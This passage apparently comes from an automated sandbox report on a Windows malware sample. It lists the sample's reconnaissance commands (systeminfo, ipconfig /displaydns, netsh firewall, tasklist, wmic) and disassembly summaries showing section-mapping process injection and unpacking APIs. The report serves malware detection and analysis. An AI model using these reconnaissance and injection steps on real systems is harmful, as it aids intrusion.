                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:35
                                                                                                                          Start time:12:25:55
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                                                                          Imagebase:0x7ff690150000
                                                                                                                          File size:576'000 bytes
                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:36
                                                                                                                          Start time:12:25:58
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\ipconfig.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:ipconfig /displaydns
                                                                                                                          Imagebase:0x7ff7991c0000
                                                                                                                          File size:35'840 bytes
                                                                                                                          MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:37
                                                                                                                          Start time:12:25:59
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:route print
                                                                                                                          Imagebase:0x7ff7b1a40000
                                                                                                                          File size:24'576 bytes
                                                                                                                          MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:38
                                                                                                                          Start time:12:26:00
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:netsh firewall show state
                                                                                                                          Imagebase:0x7ff6d3f90000
                                                                                                                          File size:96'768 bytes
                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:39
                                                                                                                          Start time:12:26:01
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\systeminfo.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:systeminfo
                                                                                                                          Imagebase:0x7ff7d6860000
                                                                                                                          File size:110'080 bytes
                                                                                                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:41
                                                                                                                          Start time:12:26:06
                                                                                                                          Start date:08/10/2024
                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:tasklist /v /fo csv
                                                                                                                          Imagebase:0x7ff773010000
                                                                                                                          File size:106'496 bytes
                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:10%
                                                                                                                            Dynamic/Decrypted Code Coverage:26.2%
                                                                                                                            Signature Coverage:42.6%
                                                                                                                            Total number of Nodes:183
                                                                                                                            Total number of Limit Nodes:6
                                                                                                                            execution_graph 3292 402e40 3294 402e37 3292->3294 3295 402edf 3294->3295 3296 4018e6 3294->3296 3297 4018f5 3296->3297 3298 40192e Sleep 3297->3298 3299 401949 3298->3299 3301 40195a 3299->3301 3302 401514 3299->3302 3301->3295 3303 401524 3302->3303 3304 4015c4 NtDuplicateObject 3303->3304 3310 401896 3303->3310 3305 4015e1 NtCreateSection 3304->3305 3304->3310 3306 401661 NtCreateSection 3305->3306 3307 401607 NtMapViewOfSection 3305->3307 3309 40168d 3306->3309 3306->3310 3307->3306 3308 40162a NtMapViewOfSection 3307->3308 3308->3306 3311 401648 3308->3311 3309->3310 3312 401697 NtMapViewOfSection 3309->3312 3310->3301 3311->3306 3312->3310 3313 4016be NtMapViewOfSection 3312->3313 3313->3310 3314 4016e0 3313->3314 3316 4016e5 3314->3316 3317 4016e7 3316->3317 3318 401874 HeapCreate 3317->3318 3319 401896 3318->3319 3319->3314 3485 401542 3486 40153b 3485->3486 3487 4015c4 NtDuplicateObject 3486->3487 3493 401896 3486->3493 3488 4015e1 NtCreateSection 3487->3488 3487->3493 3489 401661 NtCreateSection 3488->3489 3490 401607 NtMapViewOfSection 3488->3490 3492 40168d 3489->3492 3489->3493 3490->3489 3491 40162a NtMapViewOfSection 3490->3491 3491->3489 3494 401648 3491->3494 3492->3493 3495 401697 NtMapViewOfSection 3492->3495 3494->3489 3495->3493 3496 4016be NtMapViewOfSection 3495->3496 3496->3493 3497 4016e0 3496->3497 3498 4016e5 HeapCreate 3497->3498 3498->3497 3395 622267 3396 622276 3395->3396 3399 622a07 3396->3399 3405 622a22 3399->3405 3400 622a2b CreateToolhelp32Snapshot 3401 622a47 Module32First 3400->3401 3400->3405 3402 622a56 3401->3402 3404 62227f 3401->3404 3406 6226c6 3402->3406 3405->3400 3405->3401 3407 6226f1 3406->3407 3408 622702 VirtualAlloc 3407->3408 3409 62273a 3407->3409 3408->3409 3409->3409 3547 418d06 3548 418d10 3547->3548 3549 418cc0 SetPriorityClass 3548->3549 3550 418d2d 3548->3550 3549->3548 3582 402dd0 3583 402ddc 3582->3583 3584 4018e6 9 API calls 3583->3584 3585 402edf 3583->3585 3584->3585 3320 419250 3323 418df0 3320->3323 3322 419255 3324 418dfd 3323->3324 3325 418f00 7 API calls 3324->3325 3326 419046 3324->3326 3328 418f78 7 API calls 3325->3328 3327 419054 SetCommState 3326->3327 3331 41906d 3326->3331 3327->3326 3329 419024 3328->3329 3330 419018 ObjectPrivilegeAuditAlarmW 3328->3330 3332 419035 3329->3332 3333 41902d WaitForSingleObject 3329->3333 3330->3329 3334 41912a 3331->3334 3335 41907a 9 API calls 3331->3335 3332->3326 3333->3332 3347 418ac0 LocalAlloc 3334->3347 3342 419108 3335->3342 3339 41912f LoadLibraryA 3348 418af0 GetModuleHandleW GetProcAddress VirtualProtect 3339->3348 3340 41917d 3349 418d50 3340->3349 3342->3334 3343 419182 3344 4191c3 InterlockedCompareExchange 3343->3344 3345 4191a3 MoveFileW 3343->3345 3346 4191dd 3343->3346 3344->3343 3345->3343 3346->3322 3347->3339 3348->3340 3350 418d79 QueryDosDeviceW 3349->3350 3351 418d8a 3349->3351 3350->3351 3360 418c90 3351->3360 3354 418da5 3363 418cd0 3354->3363 3355 418d9d FreeEnvironmentStringsA 3355->3354 3358 418dd7 3358->3343 3359 418dbc HeapCreate GetNumaProcessorNode 3359->3358 3361 418ca1 FatalAppExitA GetModuleHandleA 3360->3361 3362 418cb3 3360->3362 3361->3362 3362->3354 3362->3355 3364 418cec 3363->3364 3365 418cde BuildCommDCBA 3363->3365 3366 418cf4 FreeEnvironmentStringsA 3364->3366 3367 418cfc 3364->3367 3365->3367 3366->3367 3368 418d2d 3367->3368 3370 418cc0 3367->3370 3368->3358 3368->3359 3373 418c40 3370->3373 3374 418c6b 3373->3374 3375 418c5c SetPriorityClass 3373->3375 3374->3367 3375->3374 3561 401915 3562 4018c6 3561->3562 3563 40191a 3561->3563 3564 40192e Sleep 3563->3564 3565 401949 3564->3565 3566 401514 8 API calls 3565->3566 3567 40195a 3565->3567 3566->3567 3414 402f97 3415 4030ee 3414->3415 3416 402fc1 3414->3416 3416->3415 3417 40307c RtlCreateUserThread NtTerminateProcess 3416->3417 3417->3415 3418 5f0005 3423 5f092b GetPEB 3418->3423 3420 5f0030 3425 5f003c 3420->3425 3424 5f0972 3423->3424 3424->3420 3426 5f0049 3425->3426 3427 5f0e0f 2 API calls 3426->3427 3428 5f0223 3427->3428 3429 5f0d90 GetPEB 3428->3429 3430 5f0238 VirtualAlloc 3429->3430 3431 5f0265 3430->3431 3432 5f02ce VirtualProtect 3431->3432 3434 5f030b 3432->3434 3433 5f0439 VirtualFree 3437 5f04be LoadLibraryA 3433->3437 3434->3433 3436 5f08c7 3437->3436 3438 5f0001 3439 5f0005 3438->3439 3440 5f092b GetPEB 3439->3440 3441 5f0030 3440->3441 3442 5f003c 7 API calls 3441->3442 3443 5f0038 3442->3443 3376 5f003c 3377 5f0049 3376->3377 3389 5f0e0f SetErrorMode SetErrorMode 3377->3389 3382 5f0265 3383 5f02ce VirtualProtect 3382->3383 3385 5f030b 3383->3385 3384 5f0439 VirtualFree 3388 5f04be LoadLibraryA 3384->3388 3385->3384 3387 5f08c7 3388->3387 3390 5f0223 3389->3390 3391 5f0d90 3390->3391 3392 5f0dad 3391->3392 3393 5f0dbb GetPEB 3392->3393 3394 5f0238 VirtualAlloc 3392->3394 3393->3394 3394->3382 3456 4018f1 3457 4018f6 3456->3457 3458 40192e Sleep 3457->3458 3459 401949 3458->3459 3460 401514 8 API calls 3459->3460 3461 40195a 3459->3461 3460->3461 3462 4016f5 3464 4016f6 3462->3464 3463 401874 HeapCreate 3465 401896 3463->3465 3464->3463 3410 401777 3412 40177a 3410->3412 3411 401874 HeapCreate 3413 401896 3411->3413 3412->3411 3543 402d7b 3546 402d38 3543->3546 3544 402dc7 3545 4018e6 9 API calls 3545->3544 3546->3543 3546->3544 3546->3545 3466 4014fe 3467 401506 3466->3467 3468 401531 3466->3468 3469 401896 3468->3469 3470 4015c4 NtDuplicateObject 3468->3470 3470->3469 3471 4015e1 NtCreateSection 3470->3471 3472 401661 NtCreateSection 3471->3472 3473 401607 NtMapViewOfSection 3471->3473 3472->3469 3475 40168d 3472->3475 3473->3472 3474 40162a NtMapViewOfSection 3473->3474 3474->3472 3476 401648 3474->3476 3475->3469 3477 401697 NtMapViewOfSection 3475->3477 3476->3472 3477->3469 3478 4016be NtMapViewOfSection 3477->3478 3478->3469 3479 4016e0 3478->3479 3480 4016e5 HeapCreate 3479->3480 3480->3479

                                                                                                                            Executed Functions

                                                                                                                            Function 00418DF0 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 321filewindowlibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 418df0-418e18 2 418e20-418e27 0->2 3 418e54-418e5a 2->3 4 418e29-418e50 2->4 5 418e5c-418e68 3->5 6 418e6e-418e78 3->6 4->3 5->6 7 418eb3-418eba 6->7 8 418e7a-418ea9 6->8 7->2 9 418ec0-418ec6 7->9 8->7 11 418ec8-418ece 9->11 12 418ed0-418ed6 11->12 13 418edc-418ee6 11->13 12->13 14 418ee8 13->14 15 418eea-418ef1 13->15 14->15 15->11 16 418ef3-418efa 15->16 17 418f00-419016 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 419046-419052 16->18 22 419024-41902b 17->22 23 419018-41901e ObjectPrivilegeAuditAlarmW 17->23 19 419054-419062 SetCommState 18->19 24 419064-41906b 19->24 25 41906d-419074 19->25 26 419035-419043 22->26 27 41902d-41902f WaitForSingleObject 22->27 23->22 24->19 24->25 28 41912a-419139 call 418ac0 25->28 29 41907a-419124 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 25->29 26->18 27->26 34 41913b-41914c 28->34 35 41916d-419178 LoadLibraryA call 418af0 28->35 29->28 37 419150-419160 34->37 42 41917d-41918e call 418d50 35->42 40 419162 37->40 41 419168-41916b 37->41 40->41 41->35 41->37 46 419190-419197 42->46 48 419199-4191a7 MoveFileW 46->48 49 4191ad-4191b3 46->49 48->49 50 4191b5 call 418ae0 49->50 51 4191ba-4191c1 49->51 50->51 55 4191c3-4191ce InterlockedCompareExchange 51->55 56 4191d4-4191db 51->56 55->56 56->46 57 4191dd-4191ed 56->57 59 4191f0-419200 57->59 60 419202 59->60 61 419209-41920c 59->61 60->61 61->59 62 41920e-419219 61->62 63 419220-419225 62->63 64 419227-41922d 63->64 65 41922f-419235 63->65 64->65 66 419237-419244 64->66 65->63 65->66
                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418F0B
                                                                                                                            • GetFocus.USER32 ref: 00418F11
                                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418F1E
                                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00418F25
                                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418F3D
                                                                                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418F45
                                                                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418F5D
                                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418F84
                                                                                                                            • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418F90
                                                                                                                            • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418FA6
                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00418FAC
                                                                                                                            • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418FF1
                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00419000
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00419009
                                                                                                                            • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041901E
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041902F
                                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00419058
                                                                                                                            • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00419089
                                                                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 0041909D
                                                                                                                            • CopyFileW.KERNEL32(0041B3AC,0041B380,00000000), ref: 004190AE
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 004190B5
                                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 004190BB
                                                                                                                            • GetBinaryType.KERNEL32(0041B3C8,?), ref: 004190CD
                                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004190E0
                                                                                                                            • GetLongPathNameA.KERNEL32(0041B3E4,?,00000000), ref: 004190F3
                                                                                                                            • PurgeComm.KERNEL32(00000000,00000000), ref: 004190FB
                                                                                                                            • LoadLibraryA.KERNELBASE(0041B3EC), ref: 00419172
                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 004191A7
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004191CE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233107637.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_40b000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                                            • String ID: k`$}$
                                                                                                                            • API String ID: 2220722107-956986773
                                                                                                                            • Opcode ID: 76067d98ed010348569ee083334d6030e4c9192beea86e856fa9a0357b35bb33
                                                                                                                            • Instruction ID: 4ca0833080540fc1689ebbf06c0baecda7ebd0e2289d1b61a46df4a83d3cd1a5
                                                                                                                            • Opcode Fuzzy Hash: 76067d98ed010348569ee083334d6030e4c9192beea86e856fa9a0357b35bb33
                                                                                                                            • Instruction Fuzzy Hash: F9B1B371902124ABDB219FA1EC48EDF7B79EF4D750F00806AF649A2151C7781AC5CFAE
                                                                                                                            Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 153 401514-401533 155 401524-40152f 153->155 156 401536-40156e call 401193 153->156 155->156 165 401570 156->165 166 401573-401578 156->166 165->166 168 401898-4018a0 166->168 169 40157e-40158f 166->169 168->166 174 4018a5-4018b7 168->174 172 401595-4015be 169->172 173 401896 169->173 172->173 183 4015c4-4015db NtDuplicateObject 172->183 173->174 179 4018c5 174->179 180 4018bc-4018e3 call 401193 174->180 179->180 183->173 184 4015e1-401605 NtCreateSection 183->184 186 401661-401687 NtCreateSection 184->186 187 401607-401628 NtMapViewOfSection 184->187 186->173 190 40168d-401691 186->190 187->186 189 40162a-401646 NtMapViewOfSection 187->189 189->186 192 401648-40165e 189->192 190->173 193 401697-4016b8 NtMapViewOfSection 190->193 192->186 193->173 195 4016be-4016da NtMapViewOfSection 193->195 195->173 198 4016e0 call 4016e5 195->198
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                            • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                            • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                            • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                                                                                                            Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 200 4014fe-401503 201 401531-40156e call 401193 200->201 202 401506-401511 200->202 212 401570 201->212 213 401573-401578 201->213 212->213 215 401898-4018a0 213->215 216 40157e-40158f 213->216 215->213 221 4018a5-4018b7 215->221 219 401595-4015be 216->219 220 401896 216->220 219->220 230 4015c4-4015db NtDuplicateObject 219->230 220->221 226 4018c5 221->226 227 4018bc-4018e3 call 401193 221->227 226->227 230->220 231 4015e1-401605 NtCreateSection 230->231 233 401661-401687 NtCreateSection 231->233 234 401607-401628 NtMapViewOfSection 231->234 233->220 237 40168d-401691 233->237 234->233 236 40162a-401646 NtMapViewOfSection 234->236 236->233 239 401648-40165e 236->239 237->220 240 401697-4016b8 NtMapViewOfSection 237->240 239->233 240->220 242 4016be-4016da NtMapViewOfSection 240->242 242->220 245 4016e0 call 4016e5 242->245
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1652636561-0
                                                                                                                            • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                            • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                            • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                            • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                                                                                                            Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 247 401542-40156e call 401193 256 401570 247->256 257 401573-401578 247->257 256->257 259 401898-4018a0 257->259 260 40157e-40158f 257->260 259->257 265 4018a5-4018b7 259->265 263 401595-4015be 260->263 264 401896 260->264 263->264 274 4015c4-4015db NtDuplicateObject 263->274 264->265 270 4018c5 265->270 271 4018bc-4018e3 call 401193 265->271 270->271 274->264 275 4015e1-401605 NtCreateSection 274->275 277 401661-401687 NtCreateSection 275->277 278 401607-401628 NtMapViewOfSection 275->278 277->264 281 40168d-401691 277->281 278->277 280 40162a-401646 NtMapViewOfSection 278->280 280->277 283 401648-40165e 280->283 281->264 284 401697-4016b8 NtMapViewOfSection 281->284 283->277 284->264 286 4016be-4016da NtMapViewOfSection 284->286 286->264 289 4016e0 call 4016e5 286->289
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                            • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                            • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                            • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                                                                                                            Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 291 401549-40156e call 401193 295 401570 291->295 296 401573-401578 291->296 295->296 298 401898-4018a0 296->298 299 40157e-40158f 296->299 298->296 304 4018a5-4018b7 298->304 302 401595-4015be 299->302 303 401896 299->303 302->303 313 4015c4-4015db NtDuplicateObject 302->313 303->304 309 4018c5 304->309 310 4018bc-4018e3 call 401193 304->310 309->310 313->303 314 4015e1-401605 NtCreateSection 313->314 316 401661-401687 NtCreateSection 314->316 317 401607-401628 NtMapViewOfSection 314->317 316->303 320 40168d-401691 316->320 317->316 319 40162a-401646 NtMapViewOfSection 317->319 319->316 322 401648-40165e 319->322 320->303 323 401697-4016b8 NtMapViewOfSection 320->323 322->316 323->303 325 4016be-4016da NtMapViewOfSection 323->325 325->303 328 4016e0 call 4016e5 325->328
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                            • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                            • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                            • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                                                                                                            Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 330 401557 331 40155b-40156e call 401193 330->331 332 40154f-401554 330->332 335 401570 331->335 336 401573-401578 331->336 332->331 335->336 338 401898-4018a0 336->338 339 40157e-40158f 336->339 338->336 344 4018a5-4018b7 338->344 342 401595-4015be 339->342 343 401896 339->343 342->343 353 4015c4-4015db NtDuplicateObject 342->353 343->344 349 4018c5 344->349 350 4018bc-4018e3 call 401193 344->350 349->350 353->343 354 4015e1-401605 NtCreateSection 353->354 356 401661-401687 NtCreateSection 354->356 357 401607-401628 NtMapViewOfSection 354->357 356->343 360 40168d-401691 356->360 357->356 359 40162a-401646 NtMapViewOfSection 357->359 359->356 362 401648-40165e 359->362 360->343 363 401697-4016b8 NtMapViewOfSection 360->363 362->356 363->343 365 4016be-4016da NtMapViewOfSection 363->365 365->343 368 4016e0 call 4016e5 365->368
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
